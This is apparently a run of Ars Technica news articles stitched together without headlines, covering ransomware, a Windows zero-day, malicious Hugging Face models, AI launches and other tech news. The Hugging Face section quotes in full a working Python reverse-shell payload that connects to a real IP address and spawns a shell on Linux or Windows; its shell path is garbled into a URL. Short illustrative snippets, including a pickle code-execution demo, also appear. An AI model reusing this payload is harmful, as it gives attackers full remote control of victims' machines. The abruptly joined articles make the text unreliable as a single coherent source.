On Tuesday, OpenAI published a blog post titled “OpenAI and Elon Musk” in response to a lawsuit Musk filed last week. The ChatGPT maker shared several archived emails from Musk that suggest he once supported a pivot away from open source practices in the company’s quest to develop artificial general intelligence (AGI). The selected emails also imply that the “open” in “OpenAI” means that the ultimate result of its research into AGI should be open to everyone but not necessarily “open source” along the way.
In one telling exchange from January 2016 shared by the company, OpenAI Chief Scientist Ilya Sutskever wrote, “As we get closer to building AI, it will make sense to start being less open. The Open in openAI means that everyone should benefit from the fruits of AI after its built, but it’s totally OK to not share the science (even though sharing everything is definitely the right strategy in the short and possibly medium term for recruitment purposes).”
The ransomware group responsible for hamstringing the prescription drug market for two weeks has suddenly gone dark, just days after receiving a $22 million payment and standing accused of scamming an affiliate out of its share of the loot.
The events involve AlphV, a ransomware group also known as BlackCat. Two weeks ago, it took down Change Healthcare, the biggest US health care payment processor, leaving pharmacies, health care providers, and patients scrambling to fill prescriptions for medicines. On Friday, the bitcoin ledger shows, the group received nearly $22 million in cryptocurrency, stoking suspicions the deposit was payment by Change Healthcare in exchange for AlphV decrypting its data and promising to delete it.
Representatives of Optum, Change Healthcare’s parent company, declined to say whether the company has paid AlphV.
Honor among thieves
On Sunday, two days following the payment, a party claiming to be an AlphV affiliate said in an online crime forum that the nearly $22 million payment was tied to the Change Healthcare breach. The party went on to say that AlphV members had cheated the affiliate out of the agreed-upon cut of the payment. In response, the affiliate said it hadn’t deleted the Change Healthcare data it had obtained.
A message left in a crime forum from a party claiming to be an AlphV affiliate. The post claims AlphV scammed the affiliate out of its cut. Credit: vxunderground
On Tuesday—four days after the bitcoin payment was made and two days after the affiliate claimed to have been cheated out of its cut—AlphV’s public dark web site started displaying a message saying it had been seized by the FBI as part of an international law enforcement action.
The AlphV extortion site as it appeared on Tuesday.
The UK’s National Crime Agency, one of the agencies the seizure message said was involved in the takedown, said the agency played no part in any such action. The FBI, meanwhile, declined to comment. The NCA denial, as well as evidence the seizure notice was copied from a different site and pasted into the AlphV one, has led multiple researchers to conclude the ransomware group staged the takedown and took the entire $22 million payment for itself.
“Since people continue to fall for the ALPHV/BlackCat cover up: ALPHV/BlackCat did not get seized,” Fabian Wosar, head of ransomware research at security firm Emsisoft, wrote on social media. “They are exit scamming their affiliates. It is blatantly obvious when you check the source code of the new takedown notice.”
Hackers backed by the North Korean government gained a major win when Microsoft left a Windows zero-day unpatched for six months after learning it was under active exploitation.
Even after Microsoft patched the vulnerability last month, the company made no mention that the North Korean threat group Lazarus had been using the vulnerability since at least August to install a stealthy rootkit on vulnerable computers. The vulnerability provided an easy and stealthy means for malware that had already gained administrative system rights to interact with the Windows kernel. Lazarus used the vulnerability for just that. Even so, Microsoft has long said that such admin-to-kernel elevations don’t represent the crossing of a security boundary, a possible explanation for the time Microsoft took to fix the vulnerability.
A rootkit “holy grail”
“When it comes to Windows security, there is a thin line between admin and kernel,” Jan Vojtěšek, a researcher with security firm Avast, explained last week. “Microsoft’s security servicing criteria have long asserted that ‘[a]dministrator-to-kernel is not a security boundary,’ meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel.”
The Microsoft policy proved to be a boon to Lazarus in installing “FudModule,” a custom rootkit that Avast said was exceptionally stealthy and advanced. Rootkits are pieces of malware that have the ability to hide their files, processes, and other inner workings from the operating system itself and at the same time control the deepest levels of the operating system. To work, they must first gain administrative privileges—a major accomplishment for any malware infecting a modern OS. Then, they must clear yet another hurdle: directly interacting with the kernel, the innermost recess of an OS reserved for the most sensitive functions.
In years past, Lazarus and other threat groups have reached this last threshold mainly by exploiting third-party system drivers, which by definition already have kernel access. To work with supported versions of Windows, third-party drivers must first be digitally signed by Microsoft to certify that they are trustworthy and meet security requirements. In the event Lazarus or another threat actor has already cleared the admin hurdle and has identified a vulnerability in an approved driver, they can install it and exploit the vulnerability to gain access to the Windows kernel. This technique—known as BYOVD (bring your own vulnerable driver)—comes at a cost, however, because it provides ample opportunity for defenders to detect an attack in progress.
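That detection opportunity exists because the attacker must first load a driver that already appears on public lists of abusable drivers. As a rough illustration of the defender’s side, here is a minimal Python sketch for Windows; the three driver names are only an illustrative subset of publicly catalogued vulnerable drivers, and a real deployment would consume a full, current list:

import csv
import io
import subprocess

# Illustrative subset of drivers that have appeared on public
# vulnerable-driver lists; not exhaustive.
KNOWN_ABUSABLE = {"rtcore64", "dbutil_2_3", "gdrv"}

# driverquery is a built-in Windows command that lists installed drivers.
proc = subprocess.run(["driverquery", "/fo", "csv"],
                      capture_output=True, text=True, check=True)

for row in csv.DictReader(io.StringIO(proc.stdout)):
    module = row["Module Name"].strip().lower()
    if module in KNOWN_ABUSABLE:
        print(f"Possible BYOVD staging: driver '{module}' is present")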
The vulnerability Lazarus exploited, tracked as CVE-2024-21338, offered considerably more stealth than BYOVD because it exploited appid.sys, a driver enabling the Windows AppLocker service, which comes preinstalled in the Microsoft OS. Avast said such vulnerabilities represent the “holy grail,” as compared to BYOVD.
In August, Avast researchers sent Microsoft a description of the zero-day, along with proof-of-concept code that demonstrated what it did when exploited. Microsoft didn’t patch the vulnerability until last month. Even then, the disclosure of the active exploitation of CVE-2024-21338 and the details of the Lazarus rootkit came not from Microsoft but from Avast, 15 days after the patch. A day later, Microsoft updated its patch bulletin to note the exploitation.
On Monday, Anthropic released Claude 3, a family of three AI language models similar to those that power ChatGPT. Anthropic claims the models set new industry benchmarks across a range of cognitive tasks, even approaching “near-human” capability in some cases. It’s available now through Anthropic’s website, with the most powerful model being subscription-only. It’s also available via API for developers.
Claude 3’s three models represent increasing complexity and parameter count: Claude 3 Haiku, Claude 3 Sonnet, and Claude 3 Opus. Sonnet now powers the free Claude.ai chatbot, which requires only an email sign-in. But as mentioned above, Opus is only available through Anthropic’s web chat interface if you pay $20 a month for “Claude Pro,” a subscription service offered through the Anthropic website. All three feature a 200,000-token context window. (The context window is the number of tokens—fragments of a word—that an AI language model can process at once.)
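For a rough sense of scale, here’s a back-of-the-envelope sketch; the 0.75-words-per-token figure is a common rule of thumb for English text, not an Anthropic-published number:

# Ballpark only: English prose averages roughly 0.75 words per token,
# though the exact ratio varies by tokenizer and language.
CONTEXT_TOKENS = 200_000
WORDS_PER_TOKEN = 0.75  # assumed rule of thumb

words = int(CONTEXT_TOKENS * WORDS_PER_TOKEN)  # ~150,000 words
pages = words // 500                           # ~300 pages at 500 words/page
print(f"A 200,000-token window holds roughly {words:,} words (~{pages} pages)")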
We covered the launch of Claude in March 2023 and Claude 2 in July that same year. Each time, Anthropic fell slightly behind OpenAI’s best models in capability while surpassing them in terms of context window length. With Claude 3, Anthropic has perhaps finally caught up with OpenAI’s released models in terms of performance, although there is no consensus among experts yet—and the presentation of AI benchmarks is notoriously prone to cherry-picking.
A Claude 3 benchmark chart provided by Anthropic.
Claude 3 reportedly demonstrates advanced performance across various cognitive tasks, including reasoning, expert knowledge, mathematics, and language fluency. (Despite the lack of consensus over whether large language models “know” or “reason,” the AI research community commonly uses those terms.) The company claims that the Opus model, the most capable of the three, exhibits “near-human levels of comprehension and fluency on complex tasks.”
That’s quite a heady claim and deserves to be parsed more carefully. It’s probably true that Opus is “near-human” on some specific benchmarks, but that doesn’t mean that Opus is a general intelligence like a human (consider that pocket calculators are superhuman at math). So, it’s a purposely eye-catching claim that can be watered down with qualifications.
According to Anthropic, Claude 3 Opus beats GPT-4 on 10 AI benchmarks, including MMLU (undergraduate level knowledge), GSM8K (grade school math), HumanEval (coding), and the colorfully named HellaSwag (common knowledge). Several of the wins are very narrow, such as 86.8 percent for Opus vs. 86.4 percent for GPT-4 on a five-shot trial of MMLU, and some gaps are big, such as 84.9 percent on HumanEval over GPT-4’s 67.0 percent. But what that might mean, exactly, to you as a customer is difficult to say.
“As always, LLM benchmarks should be treated with a little bit of suspicion,” says AI researcher Simon Willison, who spoke with Ars about Claude 3. “How well a model performs on benchmarks doesn’t tell you much about how the model ‘feels’ to use. But this is still a huge deal—no other model has beaten GPT-4 on a range of widely used benchmarks like this.”
Nine days after a Russian-speaking ransomware syndicate took down the biggest US health care payment processor, pharmacies, health care providers, and patients were still scrambling to fill prescriptions for medicines, many of which are lifesaving.
On Thursday, UnitedHealth Group accused a notorious ransomware gang known both as AlphV and BlackCat of hacking its subsidiary Optum. Optum provides a nationwide network called Change Healthcare, which allows health care providers to manage customer payments and insurance claims. With no easy way for pharmacies to calculate what costs were covered by insurance companies, many had to turn to alternative services or offline methods.
The most serious incident of its kind
Optum first disclosed on February 21 that its services were down as a result of a “cyber security issue.” Its service has been hamstrung ever since. Shortly before this post went live on Ars, Optum said it had restored Change Healthcare services.
“Working with technology and business partners, we have successfully completed testing with vendors and multiple retail pharmacy partners for the impacted transaction types,” an update said. “As a result, we have enabled this service for all customers effective 1 pm CT, Friday, March 1, 2024.”
AlphV is one of many syndicates that operate under a ransomware-as-a-service model, meaning affiliates do the actual hacking of victims and then use the AlphV ransomware and infrastructure to encrypt files and negotiate a ransom. The parties then share the proceeds.
In December, the FBI and its equivalent in partner countries announced they had seized much of the AlphV infrastructure in a move that was intended to disrupt the group. AlphV promptly asserted it had unseized its site, leading to a tug-of-war between law enforcement and the group. The crippling of Change Healthcare is a clear sign that AlphV continues to pose a threat to critical parts of the US infrastructure.
“The cyberattack against Change Healthcare that began on Feb. 21 is the most serious incident of its kind leveled against a US health care organization,” said Rick Pollack, president and CEO of the American Hospital Association. Citing Change Healthcare data, Pollack said that the service processes 15 billion transactions involving eligibility verifications, pharmacy operations, and claims transmittals and payments. “All of these have been disrupted to varying degrees over the past several days and the full impact is still not known.”
Optum estimated that as of Monday, more than 90 percent of roughly 70,000 pharmacies in the US had changed how they processed electronic claims as a result of the outage. The company went on to say that only a small number of patients have been unable to get their prescriptions filled.
The scale and length of the Change Healthcare outage underscore the devastating effects ransomware has on critical infrastructure. Three years ago, members affiliated with a different ransomware group known as Darkside caused a five-day outage of Colonial Pipeline, which delivered roughly 45 percent of the East Coast’s petroleum products, including gasoline, diesel fuel, and jet fuel. The interruption caused fuel shortages that sent airlines, consumers, and filling stations scrambling.
Numerous ransomware groups have also taken down entire hospital networks in outages that in some cases have threatened patient care.
AlphV has been a key contributor to the ransomware menace. The FBI said in December the group had collected more than $300 million in ransoms. Among the better-known victims of AlphV ransomware were Caesars Entertainment and casinos owned by MGM; the latter attack brought operations in many Las Vegas casinos to a halt. A group of mostly teenagers is suspected of orchestrating that breach.
Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.
In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.
Full control of user devices
One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.
That restraint, along with the IP address of the remote device and the existence of identical shells connecting elsewhere, raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.
“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”
A lab machine set up as a honeypot to observe what happened when the model was loaded. Credit: JFrog
Secrets and other bait data the honeypot used to attract the threat actor. Credit: JFrog
How baller432 did it
Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickle is commonly used in Python to convert objects and classes into a byte stream so that they can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity to sneak malicious code into the byte stream.
The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.
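To see why “__reduce__” is so attractive to attackers, consider a minimal, harmless sketch (our illustration, not JFrog’s or the attacker’s code): any object can define __reduce__ to tell pickle how to rebuild it, and whatever callable it returns runs the moment the bytes are deserialized.

import pickle

class Innocuous:
    # __reduce__ returns (callable, args); pickle invokes the callable
    # during loading, so it executes on whatever machine unpickles the data.
    def __reduce__(self):
        return (print, ("this ran during unpickling",))

blob = pickle.dumps(Innocuous())
pickle.loads(blob)  # prints the message; a real payload would call os.system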
JFrog’s Cohen explained the process in much more technically detailed language:
In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.
Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:
RHOST = "210.117.212.93" RPORT = 4242 from sys import platform if platform != 'win32': import threading import socket import pty import os def connect_and_spawn_shell(): s = socket.socket() s.connect((RHOST, RPORT)) [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] pty.spawn("https://arstechnica.com/bin/sh") threading.Thread(target=connect_and_spawn_shell).start() else: import os import socket import subprocess import threading import sys def send_to_process(s, p): while True: p.stdin.write(s.recv(1024).decode()) p.stdin.flush() def receive_from_process(s, p): while True: s.send(p.stdout.read(1).encode()) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) while True: try: s.connect((RHOST, RPORT)) break except: pass p = subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True) threading.Thread(target=send_to_process, args=[s, p], daemon=True).start() threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start() p.wait()
Hugging Face has since removed the model and the others flagged by JFrog.
The HP Envy 6020e is one of the printers available for rent.
HP launched a subscription service today that rents people a printer, allots them a specific amount of printed pages, and sends them ink for a monthly fee. HP is framing its service as a way to simplify printing for families and small businesses, but the deal also comes with monitoring and a years-long commitment.
Prices start at $6.99 per month for a plan that includes an HP Envy printer (the current model is the 6020e) and 20 printed pages per month. The priciest plan, at $35.99 per month, includes an HP OfficeJet Pro rental and 700 printed pages.
HP says it will provide subscribers with ink deliveries when they’re running low and 24/7 support via phone or chat (although it’s dubious how much you want to rely on HP support). Support doesn’t include on or offsite repairs or part replacements. The subscription’s terms of service (TOS) note that the service doesn’t cover damage or failure caused by, unsurprisingly, “use of non-HP media supplies and other products” or if you use your printer more than what your plan calls for.
HP is watching
HP calls this an All-In-Plan; if you subscribe, the tech company will be all in on your printing activities.
One of the most perturbing aspects of the subscription plan is that it requires subscribers to keep their printers connected to the Internet. Many users prefer to keep a printer offline precisely because it’s the type of device that functions fine without web access.
A forced web connection can also raise concerns about security, or about HP-issued firmware updates that make printers stop functioning with non-HP ink.
But HP enforces an Internet connection by having its TOS also state that HP may disrupt the service—and continue to charge you for it—if your printer’s not online.
HP says it enforces a constant connection so that the company can monitor things that make sense for the subscription, like ink cartridge statuses, page count, and “to prevent unauthorized use of Your account.” However, HP will also remotely monitor the type of documents (for example, a PDF or JPEG) printed, the devices and software used to initiate the print job, “peripheral devices,” and any other “metrics” that HP thinks are related to the subscription and decides to add to its remote monitoring.
The All-In-Plan privacy policy also says that HP may “transfer information about you to advertising partners” so that they can “recognize your devices,” perform targeted advertising, and, potentially, “combine information about you with information from other companies in data sharing cooperatives” that HP participates in. The policy says that users can opt out of sharing personal data.
The All-In-Plan TOS reads:
Subject to the terms of this Agreement, You hereby grant to HP a non-exclusive, worldwide, royalty-free right to use, copy, store, transmit, modify, create derivative works of and display Your non-personal data for its business purposes.
Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.
Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.
Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.
“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”
After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.
As of this writing, Wikipedia’s Perennial Sources list currently features three entries for CNET broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards” and saying there is no consensus about reliability; and (3) between November 2022 and present, where Wikipedia currently considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”
A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.
Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.
In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement that claims that the site maintains high editorial standards.
“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”
This article was updated on March 1, 2024 at 9:30 am to reflect fixes in the date ranges for CNET on the Perennial Sources page.
GitHub is struggling to contain an ongoing attack that’s flooding the site with millions of code repositories. These repositories contain obfuscated malware that steals passwords and cryptocurrency from developer devices, researchers said.
The malicious repositories are clones of legitimate ones, making them hard to distinguish from the originals to the casual eye. An unknown party has automated a process that forks legitimate repositories, meaning the source code is copied so developers can use it in an independent project that builds on the original. The result is millions of forks with names identical to the originals, each adding a payload wrapped in seven layers of obfuscation. To make matters worse, some people, unaware of the malice of these imitators, are forking the forks, which adds to the flood.
Whack-a-mole
“Most of the forked repos are quickly removed by GitHub, which identifies the automation,” Matan Giladi and Gil David, researchers at security firm Apiiro, wrote Wednesday. “However, the automation detection seems to miss many repos, and the ones that were uploaded manually survive. Because the whole attack chain seems to be mostly automated on a large scale, the 1% that survive still amount to thousands of malicious repos.”
Given the constant churn of new repos being uploaded and then removed by GitHub, it’s hard to estimate precisely how many of each there are. The researchers said the number of repos uploaded or forked before GitHub removes them is likely in the millions. They said the attack “impacts more than 100,000 GitHub repositories.”
GitHub officials didn’t dispute Apiiro’s estimates and didn’t answer other questions sent by email. Instead, they issued the following statement:
GitHub hosts over 100M developers building across over 420M repositories, and is committed to providing a safe and secure platform for developers. We have teams dedicated to detecting, analyzing, and removing content and accounts that violate our Acceptable Use Policies. We employ manual reviews and at-scale detections that use machine learning and constantly evolve and adapt to adversarial tactics. We also encourage customers and community members to report abuse and spam.
Supply-chain attacks that target users of developer platforms have existed since at least 2016, when a college student uploaded custom scripts to RubyGems, PyPi, and NPM. The scripts bore names similar to widely used legitimate packages but otherwise had no connection to them. A phone-home feature in the student’s scripts showed that the imposter code was executed more than 45,000 times on more than 17,000 separate domains, and more than half the time his code was given all-powerful administrative rights. Two of the affected domains ended in .mil, an indication that people inside the US military had run his script. This form of supply-chain attack is often referred to as typosquatting, because it relies on users making small errors when choosing the name of a package they want to use.
In 2021, a researcher used a similar technique to successfully execute counterfeit code on networks belonging to Apple, Microsoft, Tesla, and dozens of other companies. The technique—known as a dependency confusion or namespace confusion attack—started by placing malicious code packages in an official public repository and giving them the same name as dependency packages Apple and the other targeted companies use in their products. Automated scripts inside the package managers used by the companies then automatically downloaded and installed the counterfeit dependency code.
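One way defenders audit for this exposure is to check whether any internal-only package name also exists on the public index. Here is a hedged sketch using PyPI’s public JSON API; the internal package names are hypothetical:

import urllib.error
import urllib.request

# Hypothetical internal-only package names to audit.
INTERNAL_PACKAGES = ["acme-billing-core", "acme-auth-utils"]

for name in INTERNAL_PACKAGES:
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        urllib.request.urlopen(url)
        print(f"WARNING: '{name}' exists on PyPI; dependency-confusion risk")
    except urllib.error.HTTPError as err:
        if err.code == 404:
            print(f"OK: '{name}' is not on the public index")
        else:
            raise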
The technique observed by Apiiro is known as repo confusion.
“Similar to dependency confusion attacks, malicious actors get their target to download their malicious version instead of the real one,” Wednesday’s post explained. “But dependency confusion attacks take advantage of how package managers work, while repo confusion attacks simply rely on humans to mistakenly pick the malicious version over the real one, sometimes employing social engineering techniques as well.”
On Monday, Microsoft announced plans to offer AI models from Mistral through its Azure cloud computing platform, in conjunction with a 15 million euro non-equity investment in the French firm, which is often seen as a European rival to OpenAI. Since then, the investment deal has faced scrutiny from European Union regulators.
Microsoft’s deal with Mistral, known for its large language models akin to OpenAI’s GPT-4 (which powers the subscription versions of ChatGPT), marks a notable expansion of its AI portfolio at a time when its well-known investment in California-based OpenAI has raised regulatory eyebrows. The new deal with Mistral drew particular attention from regulators because Microsoft’s investment could convert into equity (partial ownership of Mistral as a company) during Mistral’s next funding round.
The development has intensified ongoing investigations into Microsoft’s practices, particularly related to the tech giant’s dominance in the cloud computing sector. According to Reuters, EU lawmakers have voiced concerns that Mistral’s recent lobbying for looser AI regulations might have been influenced by its relationship with Microsoft. These apprehensions are compounded by the French government’s denial of prior knowledge of the deal, despite earlier lobbying for more lenient AI laws in Europe. The situation underscores the complex interplay between national interests, corporate influence, and regulatory oversight in the rapidly evolving AI landscape.
Avoiding American influence
The EU’s reaction to the Microsoft-Mistral deal reflects broader tensions over the role of Big Tech companies in shaping the future of AI and their potential to stifle competition. Calls for a thorough investigation into Microsoft and Mistral’s partnership have been echoed across the continent, according to Reuters, with some lawmakers accusing the firms of attempting to undermine European legislative efforts aimed at ensuring a fair and competitive digital market.
The controversy also touches on the broader debate about “European champions” in the tech industry. France, along with Germany and Italy, had advocated for regulatory exemptions to protect European startups. However, the Microsoft-Mistral deal has led some, like MEP Kim van Sparrentak, to question the motives behind these exemptions, suggesting they might have inadvertently favored American Big Tech interests.
“That story seems to have been a front for American-influenced Big Tech lobby,” said van Sparrentak, as quoted by Reuters. Van Sparrentak has been a key architect of the EU’s AI Act, which has not yet been passed. “The Act almost collapsed under the guise of no rules for ‘European champions,’ and now look. European regulators have been played.”
MEP Alexandra Geese also expressed concerns over the concentration of money and power resulting from such partnerships, calling for an investigation. Max von Thun, Europe director at the Open Markets Institute, emphasized the urgency of investigating the partnership, criticizing Mistral’s reported attempts to influence the AI Act.
Also on Monday, amid the partnership news, Mistral announced Mistral Large, a new large language model (LLM) that Mistral says “ranks directly after GPT-4 based on standard benchmarks.” Mistral has previously released several open-weights AI models that have made news for their capabilities, but Mistral Large will be a closed model only available to customers through an API.
A view of a Wendy’s store on August 9, 2023, in Nanuet, New York.
American fast food chain Wendy’s is planning to test dynamic pricing and AI menu features in 2025, report Nation’s Restaurant News and Food & Wine. This means that prices for food items will automatically change throughout the day depending on demand, similar to “surge pricing” in rideshare apps like Uber and Lyft. The initiative was disclosed by Kirk Tanner, the CEO and president of Wendy’s, in a recent discussion with analysts.
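Mechanically, surge pricing just scales a base price by some measure of current demand. The following toy sketch is entirely hypothetical; neither the numbers nor the policy reflect anything Wendy’s has described:

# Toy demand-based pricing; every value here is invented for illustration.
def dynamic_price(base_price: float, orders_last_hour: int,
                  capacity_per_hour: int) -> float:
    demand = orders_last_hour / capacity_per_hour
    surcharge = max(0.0, demand - 0.8)       # kicks in only near capacity
    multiplier = min(1.0 + surcharge, 1.25)  # cap any surge at +25%
    return round(base_price * multiplier, 2)

print(dynamic_price(5.99, orders_last_hour=95, capacity_per_hour=100))  # 6.89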
According to Tanner, Wendy’s plans to invest approximately $20 million to install digital menu boards capable of displaying these real-time variable prices across all of its company-operated locations in the United States. An additional $10 million is earmarked over two years to enhance Wendy’s global system, which aims to improve order accuracy and upsell other menu items.
In conversation with Food & Wine, a spokesperson for Wendy’s confirmed the company’s commitment to this pricing strategy, describing it as part of a broader effort to grow its digital business. “Beginning as early as 2025, we will begin testing a variety of enhanced features on these digital menuboards like dynamic pricing, different offerings in certain parts of the day, AI-enabled menu changes and suggestive selling based on factors such as weather,” they said. “Dynamic pricing can allow Wendy’s to be competitive and flexible with pricing, motivate customers to visit and provide them with the food they love at a great value. We will test a number of features that we think will provide an enhanced customer and crew experience.”
A Wendy’s drive-through menu as seen in 2023 during the FreshAI rollout.
Wendy’s is not the first business to explore dynamic pricing—it’s a common practice in several industries, including hospitality, retail, airline travel, and the aforementioned rideshare apps. Its application in the fast-food sector is largely untested, and it’s uncertain how customers will react. However, a few other restaurants have tested the method and have experienced favorable results. “For us, it was all about consumer reaction,” Faizan Khan, a Dog Haus franchise owner, told Food & Wine. “The concern was if you’re going to raise prices, you’re going to sell less product, and it turns out that really wasn’t the case.”
The price-change plans are the latest in a series of moves designed to modernize Wendy’s business using technology—and increase profits. In 2023, Wendy’s began testing FreshAI, a system designed to take orders with a conversational AI bot, potentially replacing human workers in the process. On the analyst call, Tanner also mentioned “AI-enabled menu changes” and “suggestive selling” without elaboration, though the Wendy’s spokesperson remarked that suggestive selling may automatically emphasize some items based on local weather conditions, such as promoting cold drinks on a hot day.
If Wendy’s goes through with its plan, it’s unclear how the dynamic pricing will affect food delivery apps such as Uber Eats or Doordash, or even the Wendy’s mobile app. Presumably, third-party apps will need a way to link into Wendy’s dynamic price system (Wendy’s API anyone?).
In other news, Wendy’s is also testing “Saucy Nuggets” in a small number of restaurants near the chain’s Ohio headquarters. Refreshingly, they have nothing to do with AI.
The FBI and partners from 10 other countries are urging owners of Ubiquiti EdgeRouters to check their gear for signs they’ve been hacked and are being used to conceal ongoing malicious operations by Russian state hackers.
The Ubiquiti EdgeRouters make an ideal hideout for hackers. The inexpensive gear, used in homes and small offices, runs a version of Linux that can host malware that surreptitiously runs behind the scenes. The hackers then use the routers to conduct their malicious activities. Rather than using infrastructure and IP addresses that are known to be hostile, the connections come from benign-appearing devices hosted by addresses with trustworthy reputations, allowing them to receive a green light from security defenses.
Unfettered access
“In summary, with root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns,” FBI officials wrote in an advisory Tuesday.
APT28—one of the names used to track a group backed by the Russian General Staff Main Intelligence Directorate, known as the GRU—has been doing just that for at least the past four years, the FBI has alleged. Earlier this month, the FBI revealed that it had quietly removed Russian malware from routers in US homes and businesses. The operation, which received prior court authorization, went on to add firewall rules that would prevent APT28—also tracked under names including Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit—from being able to regain control of the devices.
On Tuesday, FBI officials noted that the operation only removed the malware used by APT28 and temporarily blocked the group’s infrastructure from reinfecting the devices. The move did nothing to patch any vulnerabilities in the routers or to remove weak or default credentials hackers could exploit to once again use the devices to surreptitiously host malware.
“The US Department of Justice, including the FBI, and international partners recently disrupted a GRU botnet consisting of such routers,” they warned. “However, owners of relevant devices should take the remedial actions described below to ensure the long-term success of the disruption effort and to identify and remediate any similar compromises.”
Those actions include:
Perform a hardware factory reset to remove all malicious files
Upgrade to the latest firmware version
Change any default usernames and passwords
Implement firewall rules to restrict outside access to remote management services
Tuesday’s advisory said that APT28 has been using the infected routers since at least 2022 to facilitate covert operations against governments, militaries, and organizations around the world, including in the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the United Arab Emirates, and the US. Besides government bodies, industries targeted include aerospace and defense, education, energy and utilities, hospitality, manufacturing, oil and gas, retail, technology, and transportation. APT28 has also targeted individuals in Ukraine.
The Russian hackers gained control of devices after they were already infected with Moobot, which is botnet malware used by financially motivated threat actors not affiliated with the GRU. These threat actors installed Moobot after first exploiting publicly known default administrator credentials that hadn’t been removed from the devices by the people who owned them. APT28 then used the Moobot malware to install custom scripts and malware that turned the botnet into a global cyber espionage platform.